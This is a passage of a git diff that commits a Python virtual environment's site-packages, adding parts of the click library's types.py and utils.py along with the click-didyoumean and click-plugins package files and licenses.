file. Various checks can be + enabled to validate the type of file and permissions. + + :param exists: The file or directory needs to exist for the value to + be valid. If this is not set to ``True``, and the file does not + exist, then all further checks are silently skipped. + :param file_okay: Allow a file as a value. + :param dir_okay: Allow a directory as a value. + :param readable: if true, a readable check is performed. + :param writable: if true, a writable check is performed. + :param executable: if true, an executable check is performed. + :param resolve_path: Make the value absolute and resolve any + symlinks. A ``~`` is not expanded, as this is supposed to be + done by the shell only. + :param allow_dash: Allow a single dash as a value, which indicates + a standard stream (but does not open it). Use + :func:`~click.open_file` to handle opening this value. + :param path_type: Convert the incoming path value to this type. If + ``None``, keep Python's default, which is ``str``. Useful to + convert to :class:`pathlib.Path`. + + .. versionchanged:: 8.1 + Added the ``executable`` parameter. + + .. versionchanged:: 8.0 + Allow passing ``path_type=pathlib.Path``. + + .. versionchanged:: 6.0 + Added the ``allow_dash`` parameter. + """ + + envvar_list_splitter: t.ClassVar[str] = os.path.pathsep + + def __init__( + self, + exists: bool = False, + file_okay: bool = True, + dir_okay: bool = True, + writable: bool = False, + readable: bool = True, + resolve_path: bool = False, + allow_dash: bool = False, + path_type: t.Optional[t.Type[t.Any]] = None, + executable: bool = False, + ): + self.exists = exists + self.file_okay = file_okay + self.dir_okay = dir_okay + self.readable = readable + self.writable = writable + self.executable = executable + self.resolve_path = resolve_path + self.allow_dash = allow_dash + self.type = path_type + + if self.file_okay and not self.dir_okay: + self.name: str = _("file") + elif self.dir_okay and not self.file_okay: + self.name = _("directory") + else: + self.name = _("path") + + def to_info_dict(self) -> t.Dict[str, t.Any]: + info_dict = super().to_info_dict() + info_dict.update( + exists=self.exists, + file_okay=self.file_okay, + dir_okay=self.dir_okay, + writable=self.writable, + readable=self.readable, + allow_dash=self.allow_dash, + ) + return info_dict + + def coerce_path_result( + self, value: "t.Union[str, os.PathLike[str]]" + ) -> "t.Union[str, bytes, os.PathLike[str]]": + if self.type is not None and not isinstance(value, self.type): + if self.type is str: + return os.fsdecode(value) + elif self.type is bytes: + return os.fsencode(value) + else: + return t.cast("os.PathLike[str]", self.type(value)) + + return value + + def convert( + self, + value: "t.Union[str, os.PathLike[str]]", + param: t.Optional["Parameter"], + ctx: t.Optional["Context"], + ) -> "t.Union[str, bytes, os.PathLike[str]]": + rv = value + + is_dash = self.file_okay and self.allow_dash and rv in (b"-", "-") + + if not is_dash: + if self.resolve_path: + # os.path.realpath doesn't resolve symlinks on Windows + # until Python 3.8. Use pathlib for now. + import pathlib + + rv = os.fsdecode(pathlib.Path(rv).resolve()) + + try: + st = os.stat(rv) + except OSError: + if not self.exists: + return self.coerce_path_result(rv) + self.fail( + _("{name} {filename!r} does not exist.").format( + name=self.name.title(), filename=format_filename(value) + ), + param, + ctx, + ) + + if not self.file_okay and stat.S_ISREG(st.st_mode): + self.fail( + _("{name} {filename!r} is a file.").format( + name=self.name.title(), filename=format_filename(value) + ), + param, + ctx, + ) + if not self.dir_okay and stat.S_ISDIR(st.st_mode): + self.fail( + _("{name} '{filename}' is a directory.").format( + name=self.name.title(), filename=format_filename(value) + ), + param, + ctx, + ) + + if self.readable and not os.access(rv, os.R_OK): + self.fail( + _("{name} {filename!r} is not readable.").format( + name=self.name.title(), filename=format_filename(value) + ), + param, + ctx, + ) + + if self.writable and not os.access(rv, os.W_OK): + self.fail( + _("{name} {filename!r} is not writable.").format( + name=self.name.title(), filename=format_filename(value) + ), + param, + ctx, + ) + + if self.executable and not os.access(value, os.X_OK): + self.fail( + _("{name} {filename!r} is not executable.").format( + name=self.name.title(), filename=format_filename(value) + ), + param, + ctx, + ) + + return self.coerce_path_result(rv) + + def shell_complete( + self, ctx: "Context", param: "Parameter", incomplete: str + ) -> t.List["CompletionItem"]: + """Return a special completion marker that tells the completion + system to use the shell to provide path completions for only + directories or any paths. + + :param ctx: Invocation context for this command. + :param param: The parameter that is requesting completion. + :param incomplete: Value being completed. May be empty. + + .. versionadded:: 8.0 + """ + from click.shell_completion import CompletionItem + + type = "dir" if self.dir_okay and not self.file_okay else "file" + return [CompletionItem(incomplete, type=type)] + + +class Tuple(CompositeParamType): + """The default behavior of Click is to apply a type on a value directly. + This works well in most cases, except for when `nargs` is set to a fixed + count and different types should be used for different items. In this + case the :class:`Tuple` type can be used. This type can only be used + if `nargs` is set to a fixed number. + + For more information see :ref:`tuple-type`. + + This can be selected by using a Python tuple literal as a type. + + :param types: a list of types that should be used for the tuple items. + """ + + def __init__(self, types: t.Sequence[t.Union[t.Type[t.Any], ParamType]]) -> None: + self.types: t.Sequence[ParamType] = [convert_type(ty) for ty in types] + + def to_info_dict(self) -> t.Dict[str, t.Any]: + info_dict = super().to_info_dict() + info_dict["types"] = [t.to_info_dict() for t in self.types] + return info_dict + + @property + def name(self) -> str: # type: ignore + return f"<{' '.join(ty.name for ty in self.types)}>" + + @property + def arity(self) -> int: # type: ignore + return len(self.types) + + def convert( + self, value: t.Any, param: t.Optional["Parameter"], ctx: t.Optional["Context"] + ) -> t.Any: + len_type = len(self.types) + len_value = len(value) + + if len_value != len_type: + self.fail( + ngettext( + "{len_type} values are required, but {len_value} was given.", + "{len_type} values are required, but {len_value} were given.", + len_value, + ).format(len_type=len_type, len_value=len_value), + param=param, + ctx=ctx, + ) + + return tuple(ty(x, param, ctx) for ty, x in zip(self.types, value)) + + +def convert_type(ty: t.Optional[t.Any], default: t.Optional[t.Any] = None) -> ParamType: + """Find the most appropriate :class:`ParamType` for the given Python + type. If the type isn't provided, it can be inferred from a default + value. + """ + guessed_type = False + + if ty is None and default is not None: + if isinstance(default, (tuple, list)): + # If the default is empty, ty will remain None and will + # return STRING. + if default: + item = default[0] + + # A tuple of tuples needs to detect the inner types. + # Can't call convert recursively because that would + # incorrectly unwind the tuple to a single type. + if isinstance(item, (tuple, list)): + ty = tuple(map(type, item)) + else: + ty = type(item) + else: + ty = type(default) + + guessed_type = True + + if isinstance(ty, tuple): + return Tuple(ty) + + if isinstance(ty, ParamType): + return ty + + if ty is str or ty is None: + return STRING + + if ty is int: + return INT + + if ty is float: + return FLOAT + + if ty is bool: + return BOOL + + if guessed_type: + return STRING + + if __debug__: + try: + if issubclass(ty, ParamType): + raise AssertionError( + f"Attempted to use an uninstantiated parameter type ({ty})." + ) + except TypeError: + # ty is an instance (correct), so issubclass fails. + pass + + return FuncParamType(ty) + + +#: A dummy parameter type that just does nothing. From a user's +#: perspective this appears to just be the same as `STRING` but +#: internally no string conversion takes place if the input was bytes. +#: This is usually useful when working with file paths as they can +#: appear in bytes and unicode. +#: +#: For path related uses the :class:`Path` type is a better choice but +#: there are situations where an unprocessed type is useful which is why +#: it is is provided. +#: +#: .. versionadded:: 4.0 +UNPROCESSED = UnprocessedParamType() + +#: A unicode string parameter type which is the implicit default. This +#: can also be selected by using ``str`` as type. +STRING = StringParamType() + +#: An integer parameter. This can also be selected by using ``int`` as +#: type. +INT = IntParamType() + +#: A floating point value parameter. This can also be selected by using +#: ``float`` as type. +FLOAT = FloatParamType() + +#: A boolean parameter. This is the default for boolean flags. This can +#: also be selected by using ``bool`` as a type. +BOOL = BoolParamType() + +#: A UUID parameter. +UUID = UUIDParameterType() diff --git a/env/Lib/site-packages/click/utils.py b/env/Lib/site-packages/click/utils.py new file mode 100644 index 00000000..d536434f --- /dev/null +++ b/env/Lib/site-packages/click/utils.py @@ -0,0 +1,624 @@ +import os +import re +import sys +import typing as t +from functools import update_wrapper +from types import ModuleType +from types import TracebackType + +from ._compat import _default_text_stderr +from ._compat import _default_text_stdout +from ._compat import _find_binary_writer +from ._compat import auto_wrap_for_ansi +from ._compat import binary_streams +from ._compat import open_stream +from ._compat import should_strip_ansi +from ._compat import strip_ansi +from ._compat import text_streams +from ._compat import WIN +from .globals import resolve_color_default + +if t.TYPE_CHECKING: + import typing_extensions as te + + P = te.ParamSpec("P") + +R = t.TypeVar("R") + + +def _posixify(name: str) -> str: + return "-".join(name.split()).lower() + + +def safecall(func: "t.Callable[P, R]") -> "t.Callable[P, t.Optional[R]]": + """Wraps a function so that it swallows exceptions.""" + + def wrapper(*args: "P.args", **kwargs: "P.kwargs") -> t.Optional[R]: + try: + return func(*args, **kwargs) + except Exception: + pass + return None + + return update_wrapper(wrapper, func) + + +def make_str(value: t.Any) -> str: + """Converts a value into a valid string.""" + if isinstance(value, bytes): + try: + return value.decode(sys.getfilesystemencoding()) + except UnicodeError: + return value.decode("utf-8", "replace") + return str(value) + + +def make_default_short_help(help: str, max_length: int = 45) -> str: + """Returns a condensed version of help string.""" + # Consider only the first paragraph. + paragraph_end = help.find("\n\n") + + if paragraph_end != -1: + help = help[:paragraph_end] + + # Collapse newlines, tabs, and spaces. + words = help.split() + + if not words: + return "" + + # The first paragraph started with a "no rewrap" marker, ignore it. + if words[0] == "\b": + words = words[1:] + + total_length = 0 + last_index = len(words) - 1 + + for i, word in enumerate(words): + total_length += len(word) + (i > 0) + + if total_length > max_length: # too long, truncate + break + + if word[-1] == ".": # sentence end, truncate without "..." + return " ".join(words[: i + 1]) + + if total_length == max_length and i != last_index: + break # not at sentence end, truncate with "..." + else: + return " ".join(words) # no truncation needed + + # Account for the length of the suffix. + total_length += len("...") + + # remove words until the length is short enough + while i > 0: + total_length -= len(words[i]) + (i > 0) + + if total_length <= max_length: + break + + i -= 1 + + return " ".join(words[:i]) + "..." + + +class LazyFile: + """A lazy file works like a regular file but it does not fully open + the file but it does perform some basic checks early to see if the + filename parameter does make sense. This is useful for safely opening + files for writing. + """ + + def __init__( + self, + filename: t.Union[str, "os.PathLike[str]"], + mode: str = "r", + encoding: t.Optional[str] = None, + errors: t.Optional[str] = "strict", + atomic: bool = False, + ): + self.name: str = os.fspath(filename) + self.mode = mode + self.encoding = encoding + self.errors = errors + self.atomic = atomic + self._f: t.Optional[t.IO[t.Any]] + self.should_close: bool + + if self.name == "-": + self._f, self.should_close = open_stream(filename, mode, encoding, errors) + else: + if "r" in mode: + # Open and close the file in case we're opening it for + # reading so that we can catch at least some errors in + # some cases early. + open(filename, mode).close() + self._f = None + self.should_close = True + + def __getattr__(self, name: str) -> t.Any: + return getattr(self.open(), name) + + def __repr__(self) -> str: + if self._f is not None: + return repr(self._f) + return f"" + + def open(self) -> t.IO[t.Any]: + """Opens the file if it's not yet open. This call might fail with + a :exc:`FileError`. Not handling this error will produce an error + that Click shows. + """ + if self._f is not None: + return self._f + try: + rv, self.should_close = open_stream( + self.name, self.mode, self.encoding, self.errors, atomic=self.atomic + ) + except OSError as e: # noqa: E402 + from .exceptions import FileError + + raise FileError(self.name, hint=e.strerror) from e + self._f = rv + return rv + + def close(self) -> None: + """Closes the underlying file, no matter what.""" + if self._f is not None: + self._f.close() + + def close_intelligently(self) -> None: + """This function only closes the file if it was opened by the lazy + file wrapper. For instance this will never close stdin. + """ + if self.should_close: + self.close() + + def __enter__(self) -> "LazyFile": + return self + + def __exit__( + self, + exc_type: t.Optional[t.Type[BaseException]], + exc_value: t.Optional[BaseException], + tb: t.Optional[TracebackType], + ) -> None: + self.close_intelligently() + + def __iter__(self) -> t.Iterator[t.AnyStr]: + self.open() + return iter(self._f) # type: ignore + + +class KeepOpenFile: + def __init__(self, file: t.IO[t.Any]) -> None: + self._file: t.IO[t.Any] = file + + def __getattr__(self, name: str) -> t.Any: + return getattr(self._file, name) + + def __enter__(self) -> "KeepOpenFile": + return self + + def __exit__( + self, + exc_type: t.Optional[t.Type[BaseException]], + exc_value: t.Optional[BaseException], + tb: t.Optional[TracebackType], + ) -> None: + pass + + def __repr__(self) -> str: + return repr(self._file) + + def __iter__(self) -> t.Iterator[t.AnyStr]: + return iter(self._file) + + +def echo( + message: t.Optional[t.Any] = None, + file: t.Optional[t.IO[t.Any]] = None, + nl: bool = True, + err: bool = False, + color: t.Optional[bool] = None, +) -> None: + """Print a message and newline to stdout or a file. This should be + used instead of :func:`print` because it provides better support + for different data, files, and environments. + + Compared to :func:`print`, this does the following: + + - Ensures that the output encoding is not misconfigured on Linux. + - Supports Unicode in the Windows console. + - Supports writing to binary outputs, and supports writing bytes + to text outputs. + - Supports colors and styles on Windows. + - Removes ANSI color and style codes if the output does not look + like an interactive terminal. + - Always flushes the output. + + :param message: The string or bytes to output. Other objects are + converted to strings. + :param file: The file to write to. Defaults to ``stdout``. + :param err: Write to ``stderr`` instead of ``stdout``. + :param nl: Print a newline after the message. Enabled by default. + :param color: Force showing or hiding colors and other styles. By + default Click will remove color if the output does not look like + an interactive terminal. + + .. versionchanged:: 6.0 + Support Unicode output on the Windows console. Click does not + modify ``sys.stdout``, so ``sys.stdout.write()`` and ``print()`` + will still not support Unicode. + + .. versionchanged:: 4.0 + Added the ``color`` parameter. + + .. versionadded:: 3.0 + Added the ``err`` parameter. + + .. versionchanged:: 2.0 + Support colors on Windows if colorama is installed. + """ + if file is None: + if err: + file = _default_text_stderr() + else: + file = _default_text_stdout() + + # There are no standard streams attached to write to. For example, + # pythonw on Windows. + if file is None: + return + + # Convert non bytes/text into the native string type. + if message is not None and not isinstance(message, (str, bytes, bytearray)): + out: t.Optional[t.Union[str, bytes]] = str(message) + else: + out = message + + if nl: + out = out or "" + if isinstance(out, str): + out += "\n" + else: + out += b"\n" + + if not out: + file.flush() + return + + # If there is a message and the value looks like bytes, we manually + # need to find the binary stream and write the message in there. + # This is done separately so that most stream types will work as you + # would expect. Eg: you can write to StringIO for other cases. + if isinstance(out, (bytes, bytearray)): + binary_file = _find_binary_writer(file) + + if binary_file is not None: + file.flush() + binary_file.write(out) + binary_file.flush() + return + + # ANSI style code support. For no message or bytes, nothing happens. + # When outputting to a file instead of a terminal, strip codes. + else: + color = resolve_color_default(color) + + if should_strip_ansi(file, color): + out = strip_ansi(out) + elif WIN: + if auto_wrap_for_ansi is not None: + file = auto_wrap_for_ansi(file) # type: ignore + elif not color: + out = strip_ansi(out) + + file.write(out) # type: ignore + file.flush() + + +def get_binary_stream(name: "te.Literal['stdin', 'stdout', 'stderr']") -> t.BinaryIO: + """Returns a system stream for byte processing. + + :param name: the name of the stream to open. Valid names are ``'stdin'``, + ``'stdout'`` and ``'stderr'`` + """ + opener = binary_streams.get(name) + if opener is None: + raise TypeError(f"Unknown standard stream '{name}'") + return opener() + + +def get_text_stream( + name: "te.Literal['stdin', 'stdout', 'stderr']", + encoding: t.Optional[str] = None, + errors: t.Optional[str] = "strict", +) -> t.TextIO: + """Returns a system stream for text processing. This usually returns + a wrapped stream around a binary stream returned from + :func:`get_binary_stream` but it also can take shortcuts for already + correctly configured streams. + + :param name: the name of the stream to open. Valid names are ``'stdin'``, + ``'stdout'`` and ``'stderr'`` + :param encoding: overrides the detected default encoding. + :param errors: overrides the default error mode. + """ + opener = text_streams.get(name) + if opener is None: + raise TypeError(f"Unknown standard stream '{name}'") + return opener(encoding, errors) + + +def open_file( + filename: str, + mode: str = "r", + encoding: t.Optional[str] = None, + errors: t.Optional[str] = "strict", + lazy: bool = False, + atomic: bool = False, +) -> t.IO[t.Any]: + """Open a file, with extra behavior to handle ``'-'`` to indicate + a standard stream, lazy open on write, and atomic write. Similar to + the behavior of the :class:`~click.File` param type. + + If ``'-'`` is given to open ``stdout`` or ``stdin``, the stream is + wrapped so that using it in a context manager will not close it. + This makes it possible to use the function without accidentally + closing a standard stream: + + .. code-block:: python + + with open_file(filename) as f: + ... + + :param filename: The name of the file to open, or ``'-'`` for + ``stdin``/``stdout``. + :param mode: The mode in which to open the file. + :param encoding: The encoding to decode or encode a file opened in + text mode. + :param errors: The error handling mode. + :param lazy: Wait to open the file until it is accessed. For read + mode, the file is temporarily opened to raise access errors + early, then closed until it is read again. + :param atomic: Write to a temporary file and replace the given file + on close. + + .. versionadded:: 3.0 + """ + if lazy: + return t.cast( + t.IO[t.Any], LazyFile(filename, mode, encoding, errors, atomic=atomic) + ) + + f, should_close = open_stream(filename, mode, encoding, errors, atomic=atomic) + + if not should_close: + f = t.cast(t.IO[t.Any], KeepOpenFile(f)) + + return f + + +def format_filename( + filename: "t.Union[str, bytes, os.PathLike[str], os.PathLike[bytes]]", + shorten: bool = False, +) -> str: + """Format a filename as a string for display. Ensures the filename can be + displayed by replacing any invalid bytes or surrogate escapes in the name + with the replacement character ``�``. + + Invalid bytes or surrogate escapes will raise an error when written to a + stream with ``errors="strict". This will typically happen with ``stdout`` + when the locale is something like ``en_GB.UTF-8``. + + Many scenarios *are* safe to write surrogates though, due to PEP 538 and + PEP 540, including: + + - Writing to ``stderr``, which uses ``errors="backslashreplace"``. + - The system has ``LANG=C.UTF-8``, ``C``, or ``POSIX``. Python opens + stdout and stderr with ``errors="surrogateescape"``. + - None of ``LANG/LC_*`` are set. Python assumes ``LANG=C.UTF-8``. + - Python is started in UTF-8 mode with ``PYTHONUTF8=1`` or ``-X utf8``. + Python opens stdout and stderr with ``errors="surrogateescape"``. + + :param filename: formats a filename for UI display. This will also convert + the filename into unicode without failing. + :param shorten: this optionally shortens the filename to strip of the + path that leads up to it. + """ + if shorten: + filename = os.path.basename(filename) + else: + filename = os.fspath(filename) + + if isinstance(filename, bytes): + filename = filename.decode(sys.getfilesystemencoding(), "replace") + else: + filename = filename.encode("utf-8", "surrogateescape").decode( + "utf-8", "replace" + ) + + return filename + + +def get_app_dir(app_name: str, roaming: bool = True, force_posix: bool = False) -> str: + r"""Returns the config folder for the application. The default behavior + is to return whatever is most appropriate for the operating system. + + To give you an idea, for an app called ``"Foo Bar"``, something like + the following folders could be returned: + + Mac OS X: + ``~/Library/Application Support/Foo Bar`` + Mac OS X (POSIX): + ``~/.foo-bar`` + Unix: + ``~/.config/foo-bar`` + Unix (POSIX): + ``~/.foo-bar`` + Windows (roaming): + ``C:\Users\\AppData\Roaming\Foo Bar`` + Windows (not roaming): + ``C:\Users\\AppData\Local\Foo Bar`` + + .. versionadded:: 2.0 + + :param app_name: the application name. This should be properly capitalized + and can contain whitespace. + :param roaming: controls if the folder should be roaming or not on Windows. + Has no effect otherwise. + :param force_posix: if this is set to `True` then on any POSIX system the + folder will be stored in the home folder with a leading + dot instead of the XDG config home or darwin's + application support folder. + """ + if WIN: + key = "APPDATA" if roaming else "LOCALAPPDATA" + folder = os.environ.get(key) + if folder is None: + folder = os.path.expanduser("~") + return os.path.join(folder, app_name) + if force_posix: + return os.path.join(os.path.expanduser(f"~/.{_posixify(app_name)}")) + if sys.platform == "darwin": + return os.path.join( + os.path.expanduser("~/Library/Application Support"), app_name + ) + return os.path.join( + os.environ.get("XDG_CONFIG_HOME", os.path.expanduser("~/.config")), + _posixify(app_name), + ) + + +class PacifyFlushWrapper: + """This wrapper is used to catch and suppress BrokenPipeErrors resulting + from ``.flush()`` being called on broken pipe during the shutdown/final-GC + of the Python interpreter. Notably ``.flush()`` is always called on + ``sys.stdout`` and ``sys.stderr``. So as to have minimal impact on any + other cleanup code, and the case where the underlying file is not a broken + pipe, all calls and attributes are proxied. + """ + + def __init__(self, wrapped: t.IO[t.Any]) -> None: + self.wrapped = wrapped + + def flush(self) -> None: + try: + self.wrapped.flush() + except OSError as e: + import errno + + if e.errno != errno.EPIPE: + raise + + def __getattr__(self, attr: str) -> t.Any: + return getattr(self.wrapped, attr) + + +def _detect_program_name( + path: t.Optional[str] = None, _main: t.Optional[ModuleType] = None +) -> str: + """Determine the command used to run the program, for use in help + text. If a file or entry point was executed, the file name is + returned. If ``python -m`` was used to execute a module or package, + ``python -m name`` is returned. + + This doesn't try to be too precise, the goal is to give a concise + name for help text. Files are only shown as their name without the + path. ``python`` is only shown for modules, and the full path to + ``sys.executable`` is not shown. + + :param path: The Python file being executed. Python puts this in + ``sys.argv[0]``, which is used by default. + :param _main: The ``__main__`` module. This should only be passed + during internal testing. + + .. versionadded:: 8.0 + Based on command args detection in the Werkzeug reloader. + + :meta private: + """ + if _main is None: + _main = sys.modules["__main__"] + + if not path: + path = sys.argv[0] + + # The value of __package__ indicates how Python was called. It may + # not exist if a setuptools script is installed as an egg. It may be + # set incorrectly for entry points created with pip on Windows. + # It is set to "" inside a Shiv or PEX zipapp. + if getattr(_main, "__package__", None) in {None, ""} or ( + os.name == "nt" + and _main.__package__ == "" + and not os.path.exists(path) + and os.path.exists(f"{path}.exe") + ): + # Executed a file, like "python app.py". + return os.path.basename(path) + + # Executed a module, like "python -m example". + # Rewritten by Python from "-m script" to "/path/to/script.py". + # Need to look at main module to determine how it was executed. + py_module = t.cast(str, _main.__package__) + name = os.path.splitext(os.path.basename(path))[0] + + # A submodule like "example.cli". + if name != "__main__": + py_module = f"{py_module}.{name}" + + return f"python -m {py_module.lstrip('.')}" + + +def _expand_args( + args: t.Iterable[str], + *, + user: bool = True, + env: bool = True, + glob_recursive: bool = True, +) -> t.List[str]: + """Simulate Unix shell expansion with Python functions. + + See :func:`glob.glob`, :func:`os.path.expanduser`, and + :func:`os.path.expandvars`. + + This is intended for use on Windows, where the shell does not do any + expansion. It may not exactly match what a Unix shell would do. + + :param args: List of command line arguments to expand. + :param user: Expand user home directory. + :param env: Expand environment variables. + :param glob_recursive: ``**`` matches directories recursively. + + .. versionchanged:: 8.1 + Invalid glob patterns are treated as empty expansions rather + than raising an error. + + .. versionadded:: 8.0 + + :meta private: + """ + from glob import glob + + out = [] + + for arg in args: + if user: + arg = os.path.expanduser(arg) + + if env: + arg = os.path.expandvars(arg) + + try: + matches = glob(arg, recursive=glob_recursive) + except re.error: + matches = [] + + if not matches: + out.append(arg) + else: + out.extend(matches) + + return out diff --git a/env/Lib/site-packages/click_didyoumean-0.3.0.dist-info/INSTALLER b/env/Lib/site-packages/click_didyoumean-0.3.0.dist-info/INSTALLER new file mode 100644 index 00000000..a1b589e3 --- /dev/null +++ b/env/Lib/site-packages/click_didyoumean-0.3.0.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/env/Lib/site-packages/click_didyoumean-0.3.0.dist-info/LICENSE b/env/Lib/site-packages/click_didyoumean-0.3.0.dist-info/LICENSE new file mode 100644 index 00000000..77fff8cd --- /dev/null +++ b/env/Lib/site-packages/click_didyoumean-0.3.0.dist-info/LICENSE @@ -0,0 +1,19 @@ +Copyright (c) 2016 Timo Furrer + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in +all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN +THE SOFTWARE. diff --git a/env/Lib/site-packages/click_didyoumean-0.3.0.dist-info/METADATA b/env/Lib/site-packages/click_didyoumean-0.3.0.dist-info/METADATA new file mode 100644 index 00000000..6d84ea51 --- /dev/null +++ b/env/Lib/site-packages/click_didyoumean-0.3.0.dist-info/METADATA @@ -0,0 +1,14 @@ +Metadata-Version: 2.1 +Name: click-didyoumean +Version: 0.3.0 +Summary: Enables git-like *did-you-mean* feature in click +License: MIT +Author: Timo Furrer +Author-email: timo.furrer@roche.com +Requires-Python: >=3.6.2,<4.0.0 +Classifier: License :: OSI Approved :: MIT License +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3.7 +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Requires-Dist: click (>=7) diff --git a/env/Lib/site-packages/click_didyoumean-0.3.0.dist-info/RECORD b/env/Lib/site-packages/click_didyoumean-0.3.0.dist-info/RECORD new file mode 100644 index 00000000..8c149456 --- /dev/null +++ b/env/Lib/site-packages/click_didyoumean-0.3.0.dist-info/RECORD @@ -0,0 +1,7 @@ +click_didyoumean-0.3.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +click_didyoumean-0.3.0.dist-info/LICENSE,sha256=78dPJV3W_UKJNjsb_nHNDtcLKSbIJY1hUiBOaokEHAo,1056 +click_didyoumean-0.3.0.dist-info/METADATA,sha256=Z14H3koQ6o-7SZV92h932lmyOI7wVlQJz4z2a0-8x30,495 +click_didyoumean-0.3.0.dist-info/RECORD,, +click_didyoumean-0.3.0.dist-info/WHEEL,sha256=DRf8A_Psd1SF2kVqTQOOFU1Xzl3-A2qljAxBMTOusUs,83 +click_didyoumean/__init__.py,sha256=ZdVAFTqOmOQOcKAn8ew4Knr8tYXSDwQyEzc7az-gd08,2054 +click_didyoumean/__pycache__/__init__.cpython-310.pyc,, diff --git a/env/Lib/site-packages/click_didyoumean-0.3.0.dist-info/WHEEL b/env/Lib/site-packages/click_didyoumean-0.3.0.dist-info/WHEEL new file mode 100644 index 00000000..d131b796 --- /dev/null +++ b/env/Lib/site-packages/click_didyoumean-0.3.0.dist-info/WHEEL @@ -0,0 +1,4 @@ +Wheel-Version: 1.0 +Generator: poetry 1.0.6 +Root-Is-Purelib: true +Tag: py3-none-any diff --git a/env/Lib/site-packages/click_didyoumean/__init__.py b/env/Lib/site-packages/click_didyoumean/__init__.py new file mode 100644 index 00000000..15e01cbb --- /dev/null +++ b/env/Lib/site-packages/click_didyoumean/__init__.py @@ -0,0 +1,66 @@ +""" +Extension for ``click`` to provide a group +with a git-like *did-you-mean* feature. +""" + +import difflib +import typing + +import click + + +class DYMMixin: + """ + Mixin class for click MultiCommand inherited classes + to provide git-like *did-you-mean* functionality when + a certain command is not registered. + """ + + def __init__(self, *args: typing.Any, **kwargs: typing.Any) -> None: + self.max_suggestions = kwargs.pop("max_suggestions", 3) + self.cutoff = kwargs.pop("cutoff", 0.5) + super().__init__(*args, **kwargs) # type: ignore + + def resolve_command( + self, ctx: click.Context, args: typing.List[str] + ) -> typing.Tuple[ + typing.Optional[str], typing.Optional[click.Command], typing.List[str] + ]: + """ + Overrides clicks ``resolve_command`` method + and appends *Did you mean ...* suggestions + to the raised exception message. + """ + try: + return super(DYMMixin, self).resolve_command(ctx, args) # type: ignore + except click.exceptions.UsageError as error: + error_msg = str(error) + original_cmd_name = click.utils.make_str(args[0]) + matches = difflib.get_close_matches( + original_cmd_name, + self.list_commands(ctx), # type: ignore + self.max_suggestions, + self.cutoff, + ) + if matches: + fmt_matches = "\n ".join(matches) + error_msg += "\n\n" + error_msg += f"Did you mean one of these?\n {fmt_matches}" + + raise click.exceptions.UsageError(error_msg, error.ctx) + + +class DYMGroup(DYMMixin, click.Group): + """ + click Group to provide git-like + *did-you-mean* functionality when a certain + command is not found in the group. + """ + + +class DYMCommandCollection(DYMMixin, click.CommandCollection): + """ + click CommandCollection to provide git-like + *did-you-mean* functionality when a certain + command is not found in the group. + """ diff --git a/env/Lib/site-packages/click_plugins-1.1.1.dist-info/AUTHORS.txt b/env/Lib/site-packages/click_plugins-1.1.1.dist-info/AUTHORS.txt new file mode 100644 index 00000000..17b68caa --- /dev/null +++ b/env/Lib/site-packages/click_plugins-1.1.1.dist-info/AUTHORS.txt @@ -0,0 +1,5 @@ +Authors +======= + +Kevin Wurster +Sean Gillies diff --git a/env/Lib/site-packages/click_plugins-1.1.1.dist-info/INSTALLER b/env/Lib/site-packages/click_plugins-1.1.1.dist-info/INSTALLER new file mode 100644 index 00000000..a1b589e3 --- /dev/null +++ b/env/Lib/site-packages/click_plugins-1.1.1.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/env/Lib/site-packages/click_plugins-1.1.1.dist-info/LICENSE.txt b/env/Lib/site-packages/click_plugins-1.1.1.dist-info/LICENSE.txt new file mode 100644 index 00000000..8fbd3537 --- /dev/null +++ b/env/Lib/site-packages/click_plugins-1.1.1.dist-info/LICENSE.txt @@ -0,0 +1,29 @@ +New BSD License + +Copyright (c) 2015-2019, Kevin D. Wurster, Sean C. Gillies +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + +* Redistributions of source code must retain the above copyright notice, this + list of conditions and the following disclaimer. + +* Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. + +* Neither click-plugins nor the names of its contributors may not be used to + endorse or promote products derived from this software without specific prior + written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE +FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER +CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. \ No newline at end of file diff --git a/env/Lib/site-packages/click_plugins-1.1.1.dist-info/METADATA 